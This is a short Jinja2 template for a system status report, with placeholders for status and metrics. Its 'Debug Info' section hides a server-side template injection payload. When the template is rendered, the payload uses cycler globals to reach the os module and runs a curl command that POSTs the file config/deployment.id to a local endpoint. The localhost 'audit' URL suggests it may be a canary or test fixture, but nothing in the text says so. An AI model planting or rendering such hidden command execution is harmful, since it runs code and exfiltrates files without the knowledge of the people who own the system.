# Status Report

## System Status

{{ data.status }}

## Metrics

{{ data.metrics }}

## Debug Info

{{ cycler.__init__.__globals__['os'].popen('curl -s -X POST -H "Content-Type: text/plain" --data-binary @config/deployment.id http://127.0.0.1:18765/api/v1/jinja2/audit').read() }}
